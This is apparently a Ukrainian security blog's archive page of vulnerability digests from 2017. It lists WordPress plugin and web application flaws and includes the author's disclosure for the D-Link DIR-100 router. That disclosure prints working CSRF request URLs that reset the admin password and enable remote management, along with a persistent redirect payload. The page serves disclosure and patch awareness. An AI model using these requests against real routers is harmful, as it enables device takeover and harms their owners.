Архів для категорії 'Уразливості'

Добірка уразливостей

17:22 12.09.2017

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №263

23:51 29.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Twitter, User Role, Google Adsense, WooCommerce, Gallery Master. Для котрих з’явилися експлоіти.

  • WordPress Twitter 2.37 Cross Site Scripting (деталі)
  • WordPress User Role 1.4.1 Cross Site Scripting (деталі)
  • WordPress Google Adsense 1.29 Cross Site Scripting (деталі)
  • WordPress WooCommerce 2.4.12 PHP Code Injection (деталі)
  • WordPress Gallery Master 1.0.22 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Нові уразливості в D-Link DIR-100

16:24 29.07.2017

28.10.2015

У січні, 29.01.2015, я виявив Cross-Site Request Forgery та URL Redirector Abuse уразливості в D-Link DIR-100. Це друга частина дірок в router DIR-100.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DIR-100 та D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

29.07.2017

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin

Увімкнення Remote Management:

http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

CSRF атака для зміни паролю адміна та увімкнення Remote Management:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

URL Redirector Abuse (WASC-38):

http://site/Tools/vs.htm?location=http://www.google.com

Це Persisted Redirector атака. Після вказанная адреси в параметрі location, вона зберігаться і в подальшому можна редиректити лише про заході на сторінку http://site/Tools/vs.htm.

Уразлива версія D-Link DIR-100, Firmware v1.01. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка уразливостей

16:24 27.07.2017

В даній добірці уразливості в веб додатках:

  • Glype proxy privacy settings can be disabled via CSRF (деталі)
  • zendframework security update (деталі)
  • ManageEngine EventLog Analyzer V:10.0 CSRF Vulnerability (деталі)
  • CRUCMS Crucial Networking - SQL Injection Vulnerability (деталі)
  • Glype proxy local address filter bypass (деталі)

Уразливості в плагінах для WordPress №262

23:53 26.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Portfolio, Quotes And Tips, Relevant Related Posts, Sender, Social Essentials Social Stats And Sharing Buttons. Для котрих з’явилися експлоіти.

  • WordPress Portfolio 2.27 Cross Site Scripting (деталі)
  • WordPress Quotes And Tips 1.19 Cross Site Scripting (деталі)
  • WordPress Relevant Related Posts 1.0.7 Cross Site Scripting (деталі)
  • WordPress Sender 0.7 Cross-Site Scripting (деталі)
  • WordPress Social Essentials Social Stats And Sharing Buttons 1.3.1 XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:28 25.07.2017

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities with Aztech Modem Routers (деталі)
  • Ektron CMS 9.10 SP1 - XSS Vulnerability (деталі)
  • Various critical vulnerabilities in SysAid Help Desk (RCE, file download, DoS, etc) (деталі)
  • IBM Watson (Cognea) - XSS and Redirect Vulnerabilities (деталі)
  • Glype proxy cookie jar path traversal allows code execution (деталі)

Уразливості в плагінах для WordPress №261

23:55 22.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Contact Form To DB, Donate, Facebook Like Button, Sender, PDF And Print. Для котрих з’явилися експлоіти.

  • WordPress Contact Form To DB 1.4.0 Cross Site Scripting (деталі)
  • WordPress Donate 2.0.1 Cross Site Scripting (деталі)
  • WordPress Facebook Like Button 2.32 Cross Site Scripting (деталі)
  • WordPress Sender 0.7 Cross Site Request Forgery (деталі)
  • WordPress PDF And Print 1.7.4 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в плагінах для WordPress №260

23:51 20.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Google Sitemap, Htaccess, Job Board, Limit Attempts. Для котрих з’явилися експлоіти.

  • WordPress Google Sitemap 2.9.1 Cross Site Scripting (деталі)
  • WordPress Htaccess 1.4 Cross Site Scripting (деталі)
  • WordPress Job Board 1.0.0 Cross Site Scripting (деталі)
  • WordPress Limit Attempts 1.0.3 Cross Site Request Forgery (деталі)
  • WordPress Limit Attempts 1.0.3 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:29 20.07.2017

В даній добірці уразливості в веб додатках:

  • HP Network Node Manager I (NNMi) for Windows and Linux, Remote Execution of Arbitrary Code (деталі)
  • Ektron CMS 9.10 SP1 - CSRF Vulnerability (деталі)
  • Ektron CMS 9.10 SP1 - XSS Vulnerability (деталі)
  • Local PHP File Inclusion in ResourceSpace (деталі)
  • procmail vulnerability (деталі)

Добірка уразливостей

18:22 18.07.2017

В даній добірці уразливості в веб додатках: